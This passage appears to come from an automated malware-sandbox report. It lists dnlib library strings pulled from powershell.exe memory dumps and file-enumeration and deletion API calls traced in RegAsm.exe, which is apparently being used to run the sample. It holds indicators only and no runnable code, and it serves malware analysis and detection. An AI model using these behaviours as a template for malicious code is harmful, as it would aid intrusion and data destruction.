                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.407267759.0000000000F50000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000C.00000002.407100012.0000000000789000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.407906179.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.410067360.0000000006470000.00000004.08000000.00040000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00407877 FindFirstFileW,FindNextFileW,13_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0044E8F9 FindFirstFileExA,13_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 13_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00419B86
